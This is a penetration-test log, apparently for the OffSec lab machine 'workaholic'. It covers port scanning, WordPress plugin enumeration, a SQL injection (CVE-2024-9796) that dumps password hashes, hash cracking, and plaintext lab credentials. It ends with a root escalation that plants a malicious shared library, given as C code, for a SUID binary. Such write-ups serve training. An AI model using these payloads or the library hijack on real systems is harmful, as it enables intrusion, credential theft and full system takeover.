🧪 Pentest Log: {{date:2025-08-03}}

🔍 Target Information

• Machine Name: workaholic
• IP Address: 192.168.223.229
• Operating System: Linux

ip=192.168.223.229

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80

Web Content Enumeration

wpscan --url http://workaholic.offsec

found plugin:

[+] wp-advanced-search
 | Location: http://workaholic.offsec/wp-content/plugins/wp-advanced-search/
 | Last Updated: 2024-11-05T18:15:00.000Z
 | [!] The version is out of date, the latest version is 3.3.9.3
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 3.3.8 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://workaholic.offsec/wp-content/plugins/wp-advanced-search/readme.txt

search for exploits and found CVE-2024-9796

https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: SQLI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

curl "https://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"

curl "https://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_pass&type=&e"

Crack retrieved hashes using john

john --wordlist=../../rockyou.txt --format=phpass crackme.txt

obtain credentials

ted:okadamat17
charlie:chrish20

Using ted's credential login ftp server

ftp ted@$ip

found database credential from wp-config.php

rU)tJnTw5*ShDt4nOx

SSH

charlie:rU)tJnTw5*ShDt4nOx

ssh charlie@ip

🧬 Privilege Escalation

👤 Current Access

• User: charlie
• Groups: charlie
• Shell Type: ssh

🔍 Enumeration

SUID:

find / -type f -perm -4000 2>/dev/null

found /var/www/html/wordpress/blog/wp-monitor with suid

strings /var/www/html/wordpress/blog/wp-monitor

found shared library /home/ted/.lib/libsecurity.so

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: SUID
• Target Binary/Service: wp-monitor
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

vim exploit.c

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash /home/ted/");
    system("chmod +s /home/ted/bash");
}

gcc -shared -fPIC -nostartfiles -o /home/ted/.lib/libsecurity.so exploit.c

• Smash to root

/var/www/html/wordpress/blog/wp-monitor

./bash -p